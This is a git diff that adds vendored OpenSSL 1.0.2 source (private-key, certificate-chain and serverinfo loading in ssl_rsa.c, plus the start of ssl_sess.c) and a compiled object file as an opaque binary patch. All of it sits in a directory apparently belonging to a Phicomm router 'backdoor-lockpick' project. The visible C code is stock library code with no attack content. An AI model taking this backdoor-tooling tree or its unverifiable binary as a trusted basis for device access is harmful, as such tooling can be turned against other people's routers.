+int SSL_CTX_use_RSAPrivateKey_file(SSL_CTX *ctx, const char *file, int type)
+{
+    int j, ret = 0;
+    BIO *in;
+    RSA *rsa = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        rsa = d2i_RSAPrivateKey_bio(in, NULL);
+    } else if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        rsa = PEM_read_bio_RSAPrivateKey(in, NULL,
+                                         ctx->default_passwd_callback,
+                                         ctx->default_passwd_callback_userdata);
+    } else {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+    if (rsa == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE, j);
+        goto end;
+    }
+    ret = SSL_CTX_use_RSAPrivateKey(ctx, rsa);
+    RSA_free(rsa);
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+# endif
+
+int SSL_CTX_use_RSAPrivateKey_ASN1(SSL_CTX *ctx, const unsigned char *d,
+                                   long len)
+{
+    int ret;
+    const unsigned char *p;
+    RSA *rsa;
+
+    p = d;
+    if ((rsa = d2i_RSAPrivateKey(NULL, &p, (long)len)) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_CTX_use_RSAPrivateKey(ctx, rsa);
+    RSA_free(rsa);
+    return (ret);
+}
+#endif                          /* !OPENSSL_NO_RSA */
+
+int SSL_CTX_use_PrivateKey(SSL_CTX *ctx, EVP_PKEY *pkey)
+{
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ctx->cert)) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    return (ssl_set_pkey(ctx->cert, pkey));
+}
+
+#ifndef OPENSSL_NO_STDIO
+int SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type)
+{
+    int j, ret = 0;
+    BIO *in;
+    EVP_PKEY *pkey = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        pkey = PEM_read_bio_PrivateKey(in, NULL,
+                                       ctx->default_passwd_callback,
+                                       ctx->default_passwd_callback_userdata);
+    } else if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        pkey = d2i_PrivateKey_bio(in, NULL);
+    } else {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE, j);
+        goto end;
+    }
+    ret = SSL_CTX_use_PrivateKey(ctx, pkey);
+    EVP_PKEY_free(pkey);
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+#endif
+
+int SSL_CTX_use_PrivateKey_ASN1(int type, SSL_CTX *ctx,
+                                const unsigned char *d, long len)
+{
+    int ret;
+    const unsigned char *p;
+    EVP_PKEY *pkey;
+
+    p = d;
+    if ((pkey = d2i_PrivateKey(type, NULL, &p, (long)len)) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_PRIVATEKEY_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_CTX_use_PrivateKey(ctx, pkey);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_STDIO
+/*
+ * Read a file that contains our certificate in "PEM" format, possibly
+ * followed by a sequence of CA certificates that should be sent to the peer
+ * in the Certificate message.
+ */
+int SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file)
+{
+    BIO *in;
+    int ret = 0;
+    X509 *x = NULL;
+
+    ERR_clear_error();          /* clear error stack for
+                                 * SSL_CTX_use_certificate() */
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+
+    x = PEM_read_bio_X509_AUX(in, NULL, ctx->default_passwd_callback,
+                              ctx->default_passwd_callback_userdata);
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE, ERR_R_PEM_LIB);
+        goto end;
+    }
+
+    ret = SSL_CTX_use_certificate(ctx, x);
+
+    if (ERR_peek_error() != 0)
+        ret = 0;                /* Key/certificate mismatch doesn't imply
+                                 * ret==0 ... */
+    if (ret) {
+        /*
+         * If we could set up our certificate, now proceed to the CA
+         * certificates.
+         */
+        X509 *ca;
+        int r;
+        unsigned long err;
+
+        SSL_CTX_clear_chain_certs(ctx);
+
+        while ((ca = PEM_read_bio_X509(in, NULL,
+                                       ctx->default_passwd_callback,
+                                       ctx->default_passwd_callback_userdata))
+               != NULL) {
+            r = SSL_CTX_add0_chain_cert(ctx, ca);
+            if (!r) {
+                X509_free(ca);
+                ret = 0;
+                goto end;
+            }
+            /*
+             * Note that we must not free r if it was successfully added to
+             * the chain (while we must free the main certificate, since its
+             * reference count is increased by SSL_CTX_use_certificate).
+             */
+        }
+        /* When the while loop ends, it's usually just EOF. */
+        err = ERR_peek_last_error();
+        if (ERR_GET_LIB(err) == ERR_LIB_PEM
+            && ERR_GET_REASON(err) == PEM_R_NO_START_LINE)
+            ERR_clear_error();
+        else
+            ret = 0;            /* some real error */
+    }
+
+ end:
+    if (x != NULL)
+        X509_free(x);
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+static int serverinfo_find_extension(const unsigned char *serverinfo,
+                                     size_t serverinfo_length,
+                                     unsigned int extension_type,
+                                     const unsigned char **extension_data,
+                                     size_t *extension_length)
+{
+    *extension_data = NULL;
+    *extension_length = 0;
+    if (serverinfo == NULL || serverinfo_length == 0)
+        return 0;
+    for (;;) {
+        unsigned int type = 0;
+        size_t len = 0;
+
+        /* end of serverinfo */
+        if (serverinfo_length == 0)
+            return -1;          /* Extension not found */
+
+        /* read 2-byte type field */
+        if (serverinfo_length < 2)
+            return 0;           /* Error */
+        type = (serverinfo[0] << 8) + serverinfo[1];
+        serverinfo += 2;
+        serverinfo_length -= 2;
+
+        /* read 2-byte len field */
+        if (serverinfo_length < 2)
+            return 0;           /* Error */
+        len = (serverinfo[0] << 8) + serverinfo[1];
+        serverinfo += 2;
+        serverinfo_length -= 2;
+
+        if (len > serverinfo_length)
+            return 0;           /* Error */
+
+        if (type == extension_type) {
+            *extension_data = serverinfo;
+            *extension_length = len;
+            return 1;           /* Success */
+        }
+
+        serverinfo += len;
+        serverinfo_length -= len;
+    }
+    return 0;                   /* Error */
+}
+
+static int serverinfo_srv_parse_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char *in,
+                                   size_t inlen, int *al, void *arg)
+{
+
+    if (inlen != 0) {
+        *al = SSL_AD_DECODE_ERROR;
+        return 0;
+    }
+
+    return 1;
+}
+
+static int serverinfo_srv_add_cb(SSL *s, unsigned int ext_type,
+                                 const unsigned char **out, size_t *outlen,
+                                 int *al, void *arg)
+{
+    const unsigned char *serverinfo = NULL;
+    size_t serverinfo_length = 0;
+
+    /* Is there serverinfo data for the chosen server cert? */
+    if ((ssl_get_server_cert_serverinfo(s, &serverinfo,
+                                        &serverinfo_length)) != 0) {
+        /* Find the relevant extension from the serverinfo */
+        int retval = serverinfo_find_extension(serverinfo, serverinfo_length,
+                                               ext_type, out, outlen);
+        if (retval == 0)
+            return 0;           /* Error */
+        if (retval == -1)
+            return -1;          /* No extension found, don't send extension */
+        return 1;               /* Send extension */
+    }
+    return -1;                  /* No serverinfo data found, don't send
+                                 * extension */
+}
+
+/*
+ * With a NULL context, this function just checks that the serverinfo data
+ * parses correctly.  With a non-NULL context, it registers callbacks for
+ * the included extensions.
+ */
+static int serverinfo_process_buffer(const unsigned char *serverinfo,
+                                     size_t serverinfo_length, SSL_CTX *ctx)
+{
+    if (serverinfo == NULL || serverinfo_length == 0)
+        return 0;
+    for (;;) {
+        unsigned int ext_type = 0;
+        size_t len = 0;
+
+        /* end of serverinfo */
+        if (serverinfo_length == 0)
+            return 1;
+
+        /* read 2-byte type field */
+        if (serverinfo_length < 2)
+            return 0;
+        /* FIXME: check for types we understand explicitly? */
+
+        /* Register callbacks for extensions */
+        ext_type = (serverinfo[0] << 8) + serverinfo[1];
+        if (ctx && !SSL_CTX_add_server_custom_ext(ctx, ext_type,
+                                                  serverinfo_srv_add_cb,
+                                                  NULL, NULL,
+                                                  serverinfo_srv_parse_cb,
+                                                  NULL))
+            return 0;
+
+        serverinfo += 2;
+        serverinfo_length -= 2;
+
+        /* read 2-byte len field */
+        if (serverinfo_length < 2)
+            return 0;
+        len = (serverinfo[0] << 8) + serverinfo[1];
+        serverinfo += 2;
+        serverinfo_length -= 2;
+
+        if (len > serverinfo_length)
+            return 0;
+
+        serverinfo += len;
+        serverinfo_length -= len;
+    }
+}
+
+int SSL_CTX_use_serverinfo(SSL_CTX *ctx, const unsigned char *serverinfo,
+                           size_t serverinfo_length)
+{
+    if (ctx == NULL || serverinfo == NULL || serverinfo_length == 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (!serverinfo_process_buffer(serverinfo, serverinfo_length, NULL)) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, SSL_R_INVALID_SERVERINFO_DATA);
+        return 0;
+    }
+    if (!ssl_cert_inst(&ctx->cert)) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (ctx->cert->key == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, ERR_R_INTERNAL_ERROR);
+        return 0;
+    }
+    ctx->cert->key->serverinfo = OPENSSL_realloc(ctx->cert->key->serverinfo,
+                                                 serverinfo_length);
+    if (ctx->cert->key->serverinfo == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    memcpy(ctx->cert->key->serverinfo, serverinfo, serverinfo_length);
+    ctx->cert->key->serverinfo_length = serverinfo_length;
+
+    /*
+     * Now that the serverinfo is validated and stored, go ahead and
+     * register callbacks.
+     */
+    if (!serverinfo_process_buffer(serverinfo, serverinfo_length, ctx)) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO, SSL_R_INVALID_SERVERINFO_DATA);
+        return 0;
+    }
+    return 1;
+}
+
+# ifndef OPENSSL_NO_STDIO
+int SSL_CTX_use_serverinfo_file(SSL_CTX *ctx, const char *file)
+{
+    unsigned char *serverinfo = NULL;
+    size_t serverinfo_length = 0;
+    unsigned char *extension = 0;
+    long extension_length = 0;
+    char *name = NULL;
+    char *header = NULL;
+    char namePrefix[] = "SERVERINFO FOR ";
+    int ret = 0;
+    BIO *bin = NULL;
+    size_t num_extensions = 0;
+
+    if (ctx == NULL || file == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE,
+               ERR_R_PASSED_NULL_PARAMETER);
+        goto end;
+    }
+
+    bin = BIO_new(BIO_s_file_internal());
+    if (bin == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+    if (BIO_read_filename(bin, file) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+
+    for (num_extensions = 0;; num_extensions++) {
+        if (PEM_read_bio(bin, &name, &header, &extension, &extension_length)
+            == 0) {
+            /*
+             * There must be at least one extension in this file
+             */
+            if (num_extensions == 0) {
+                SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE,
+                       SSL_R_NO_PEM_EXTENSIONS);
+                goto end;
+            } else              /* End of file, we're done */
+                break;
+        }
+        /* Check that PEM name starts with "BEGIN SERVERINFO FOR " */
+        if (strlen(name) < strlen(namePrefix)) {
+            SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE,
+                   SSL_R_PEM_NAME_TOO_SHORT);
+            goto end;
+        }
+        if (strncmp(name, namePrefix, strlen(namePrefix)) != 0) {
+            SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE,
+                   SSL_R_PEM_NAME_BAD_PREFIX);
+            goto end;
+        }
+        /*
+         * Check that the decoded PEM data is plausible (valid length field)
+         */
+        if (extension_length < 4
+            || (extension[2] << 8) + extension[3] != extension_length - 4) {
+            SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE, SSL_R_BAD_DATA);
+            goto end;
+        }
+        /* Append the decoded extension to the serverinfo buffer */
+        serverinfo =
+            OPENSSL_realloc(serverinfo, serverinfo_length + extension_length);
+        if (serverinfo == NULL) {
+            SSLerr(SSL_F_SSL_CTX_USE_SERVERINFO_FILE, ERR_R_MALLOC_FAILURE);
+            goto end;
+        }
+        memcpy(serverinfo + serverinfo_length, extension, extension_length);
+        serverinfo_length += extension_length;
+
+        OPENSSL_free(name);
+        name = NULL;
+        OPENSSL_free(header);
+        header = NULL;
+        OPENSSL_free(extension);
+        extension = NULL;
+    }
+
+    ret = SSL_CTX_use_serverinfo(ctx, serverinfo, serverinfo_length);
+ end:
+    /* SSL_CTX_use_serverinfo makes a local copy of the serverinfo. */
+    OPENSSL_free(name);
+    OPENSSL_free(header);
+    OPENSSL_free(extension);
+    OPENSSL_free(serverinfo);
+    if (bin != NULL)
+        BIO_free(bin);
+    return ret;
+}
+# endif                         /* OPENSSL_NO_STDIO */
+#endif                          /* OPENSSL_NO_TLSEXT */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_rsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_rsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..75359e13bd7620acbd0f426c9dbda2b377918ecd
GIT binary patch
literal 16560
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
UIlN2tZ<{W<Yliug`?mJ~e?RLWM*si-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_sess.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_sess.c
new file mode 100644
index 0000000..1e1002f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_sess.c
@@ -0,0 +1,1147 @@
+/* ssl/ssl_sess.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
